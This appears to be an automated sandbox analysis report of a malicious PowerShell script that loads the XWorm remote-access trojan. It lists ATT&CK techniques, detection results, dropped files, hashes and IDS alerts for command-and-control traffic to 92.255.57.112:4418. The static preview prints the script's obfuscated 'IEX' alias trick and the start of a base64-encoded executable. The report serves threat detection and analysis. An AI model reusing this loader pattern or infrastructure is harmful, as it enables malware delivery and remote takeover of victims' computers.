            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		231
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol1
            Clipboard Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
            Process Injection            		Security Account Manager231
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            92.255.57_1.112.ps118%VirustotalBrowse
            92.255.57_1.112.ps113%ReversingLabsScript.Trojan.Heuristic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            92.255.57.1120%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            15.164.165.52.in-addr.arpa
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              92.255.57.112true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2168812433.0000021C4B438000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://go.micropowershell.exe, 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2168812433.0000021C4B438000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://upx.sf.netAmcache.hve.0.drfalse
                                		high
                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.2168812433.0000021C4A061000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2168812433.0000021C4A061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      92.255.57.112
                                      		unknownRussian Federation
                                      		42253TELSPRUtrue

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1590525
                                      Start date and time:2025-01-14 08:26:32 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 57s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:10
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:92.255.57_1.112.ps1
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winPS1@6/9@1/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 12
                                      • Number of non-executed functions: 10
                                      Cookbook Comments:
                                      • Found application associated with file extension: .ps1
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.75, 13.107.246.45, 4.245.163.56, 52.165.164.15
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      02:27:23API Interceptor27x Sleep call for process: powershell.exe modified
                                      02:27:27API Interceptor1x Sleep call for process: wermgr.exe modified
                                      02:27:27API Interceptor9674011x Sleep call for process: RegSvcs.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      92.255.57.112book_lumm2.dat.exeGet hashmaliciousXWormBrowse

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TELSPRUbook_lumm2.dat.exeGet hashmaliciousXWormBrowse
                                        • 92.255.57.112
                                        http://92.255.57.155/1/1.pngGet hashmaliciousUnknownBrowse
                                        • 92.255.57.155
                                        92.255.57.155.ps1Get hashmaliciousXWormBrowse
                                        • 92.255.57.155
                                        png2obj1_XClient.exeGet hashmaliciousXWormBrowse
                                        • 92.255.57.155
                                        Dm35sdidf3.exeGet hashmaliciousXWormBrowse
                                        • 92.255.57.155
                                        QP2uO3eN2p.ps1Get hashmaliciousXWormBrowse
                                        • 92.255.57.155
                                        WErY5oc4hl.ps1Get hashmaliciousXWormBrowse
                                        • 92.255.57.155
                                        NLXwvLjXPh.ps1Get hashmaliciousXWormBrowse
                                        • 92.255.57.155
                                        mhqxUdpe7V.ps1Get hashmaliciousXWormBrowse
                                        • 92.255.57.155

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a2abdbfe428d67222a333c07b1678b548034_00000000_54e5abc7-bd2e-46d6-8d39-0df8afbbefde\Report.wer

                                        Download File
                                        Process:C:\Windows\System32\wermgr.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.5319159604060092
                                        Encrypted:false
                                        SSDEEP:96:JvjUF/Yj4brxYid8IRH3Uje0e35/3oo16l51QXIGZAX/d5FMT2SlPkpXmTA/f/VD:hjUFa4bmG5R30md8cAzuiF3Z24lO8D
                                        MD5:71570DD932FB049B2FB7EBCC488387F5
                                        SHA1:DB05666F22875C070B381191A0855B6F27E5DE9B
                                        SHA-256:612D28A575B2725FD405013A807AF7532AD067CFD4AA102ACF93B6655B9096CE
                                        SHA-512:71845BB8761F055EA30FBDFDF6C39DEF46FD98DB3B0F7C25AFD7200A3A628A61DFA891B103E1C8415DDA429BD1F75EED48E34B31D6E486BABD1CFE48F1FC2607
                                        Malicious:false
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.1.3.2.9.2.9.0.1.3.9.6.6.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.1.3.2.4.5.0.5.6.3.3.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.e.5.a.b.c.7.-.b.d.2.e.-.4.6.d.6.-.8.d.3.9.-.0.d.f.8.a.f.b.b.e.f.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.9.0.-.0.0.0.1.-.0.0.1.5.-.a.9.7.5.-.d.a.b.f.5.5.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER789D.tmp.WERInternalMetadata.xml

                                        Download File
                                        Process:C:\Windows\System32\wermgr.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):7284
                                        Entropy (8bit):3.7387095707741227
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJmSDa6Y2DEj0BDgmft887ZphUXVm:R6lXJLe6YZj0BDgmftZRc4
                                        MD5:3E1149EF1AD8DFF5BD95EC0B6C99F1AF
                                        SHA1:782CE759C658A86B8C802D6EF12E57F89DB7FFC7
                                        SHA-256:7912B0875413BFF504AD16C629927106C28C9357C5E880FF9073046237B8B78D
                                        SHA-512:85DDCBA6AB8DD69D9D18C04EA7C595C760DA14521CD52791AEE8E63EEA2734929DCE13685B0297857DA55BAA98F9C5B00C1FB66F3C9F581F5882AADC247AE24E
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.2.8.<./.P.i.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER78FC.tmp.xml

                                        Download File
                                        Process:C:\Windows\System32\wermgr.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4905
                                        Entropy (8bit):4.685576687829041
                                        Encrypted:false
                                        SSDEEP:96:uIjfEkI76j7V8SJFKloF1cmFIWTzF1cmFHjufMd:uIvY6j7x4JuUGjufy
                                        MD5:6F5C77BFC1D3C9C3D7F99E8C1F4B0B68
                                        SHA1:52F9A60B9D80BDAF8315E79FBDD736D7DD24766C
                                        SHA-256:371129BD6F8AF2678270295DBE74B59B9DEEE3E50D24B015AF4AC753EC2F0355
                                        SHA-512:58B2C24681F83AE5F683978BD91231BD5C3C7FE21EEAC669CA6914270B3B5FCEDB4309FE514951221E9A52AD6409B07F37B8588D9F2921F21A57146691185A52
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675270" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllul/nq/llh:NllUyt
                                        MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                        SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                        SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                        SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e................................................@..........

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0zaqn01.tlr.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rypfwt53.3kj.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6224
                                        Entropy (8bit):3.7211142793483583
                                        Encrypted:false
                                        SSDEEP:48:WLa1RSDdlWtMaU3CyOU2URCukvhkvklCywGhQJCSlHJ2SogZoyBQJCSlw2SogZoI:j0/N3CETdkvhkvCCt6cCSDHJcCSoHp
                                        MD5:927535DAD9F6A7509DEE532E26D6D254
                                        SHA1:278AF190BE58773A31C502135EAB9DF53FF3CDE7
                                        SHA-256:6AC5B8A707B7E1931C71828891067D1E562699D098055228EF67B7585827E3D8
                                        SHA-512:6FCE1F081BF71450C72BE3B41C69CC618B5C61233258EF3293BCB3472923D1A6DC8D7F5CC2B2B87E2D7D284844181E6E57FFD0312DC8F3611FB00A2DC7ABAD6E
                                        Malicious:false
                                        Preview:...................................FL..................F.".. ...J.S......Uf..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...0...Uf......Uf......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Zj;...........................^.A.p.p.D.a.t.a...B.V.1......Zh;..Roaming.@......EW<2.Zh;..../.....................)...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Ze;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Ze;....2.......................%.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Ze;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Ze;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Zk;....u...........

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6ME6YRELRW9LTQRIXF9V.temp

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6224
                                        Entropy (8bit):3.7211142793483583
                                        Encrypted:false
                                        SSDEEP:48:WLa1RSDdlWtMaU3CyOU2URCukvhkvklCywGhQJCSlHJ2SogZoyBQJCSlw2SogZoI:j0/N3CETdkvhkvCCt6cCSDHJcCSoHp
                                        MD5:927535DAD9F6A7509DEE532E26D6D254
                                        SHA1:278AF190BE58773A31C502135EAB9DF53FF3CDE7
                                        SHA-256:6AC5B8A707B7E1931C71828891067D1E562699D098055228EF67B7585827E3D8
                                        SHA-512:6FCE1F081BF71450C72BE3B41C69CC618B5C61233258EF3293BCB3472923D1A6DC8D7F5CC2B2B87E2D7D284844181E6E57FFD0312DC8F3611FB00A2DC7ABAD6E
                                        Malicious:false
                                        Preview:...................................FL..................F.".. ...J.S......Uf..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...0...Uf......Uf......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Zj;...........................^.A.p.p.D.a.t.a...B.V.1......Zh;..Roaming.@......EW<2.Zh;..../.....................)...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Ze;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Ze;....2.......................%.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Ze;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Ze;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Zk;....u...........

                                        C:\Windows\appcompat\Programs\Amcache.hve

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.469404423457669
                                        Encrypted:false
                                        SSDEEP:6144:7zZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuN2jDH5S:3ZHtYZWOKnMM6bFpwj4
                                        MD5:58C8AA287D7ED582D88BC002F4F946DE
                                        SHA1:0027660ECDEC1B189E3C60FAC865D9D28234EA37
                                        SHA-256:914412963481C88E50DF474BE3556DE0DE79C8AEE620B31AD4E1E3DDCA0C9934
                                        SHA-512:372AD0900322049FA251101AD7DF79DE3D1DAAD3BD37DC66702111574F0894B746E2657D355236947E2671D2F5FF0AAC9C3B8E80D3407D9573EA0EA544214329
                                        Malicious:false
                                        Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....Uf..............................................................................................................................................................................................................................................................................................................................................q...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:ASCII text, with very long lines (65478), with CRLF line terminators
                                        Entropy (8bit):5.1145929156583945
                                        TrID:
                                          File name:92.255.57_1.112.ps1
                                          File size:191'697 bytes
                                          MD5:d2334ba5738e776d924f60934e24874f
                                          SHA1:bb8dfe86ea75e9926de42a8acdfa4f9579681cbb
                                          SHA256:2a8290c18d10fa8a7e99575855b9fb8e734ea92b1aa7dce9840282c2657ba08c
                                          SHA512:1373a1537ca1a3fd7fe2e34ebdf30072f98beaad714353bcce168a3d9533eaf7aee7276360f5e41c29886467a591d667f7e99a543ba38b22808af32d72e92f56
                                          SSDEEP:3072:jbUdG3oRIPejlkZ17f6f8eWDPeW03uUyicETl+uHn23LUgJiQjOC3EDbVvz2NMnK:jwG3oRTjlkZ56f8eWDPeW03uUyicUl+h
                                          TLSH:3F144B321212BC8E5F7F3F44A50429A11C9C787BAB65C59CFBC909F924AA520CF78DB4
                                          File Content Preview:.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIp2gmcAAAAAAA

                                          File Icon

                                          Icon Hash:3270d6baae77db44

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2025-01-14T08:27:39.856350+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:27:40.073058+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:27:40.116270+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:27:44.937260+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:27:44.937260+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:27:51.255164+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:27:51.257204+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:02.442476+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:02.445368+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:13.635190+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:13.637235+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:14.956835+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:24.817914+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:24.820770+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:36.005064+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:36.007395+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:36.489510+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:36.491595+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:37.296156+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:37.308760+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:38.348994+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:38.351281+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:42.036211+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:42.039660+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
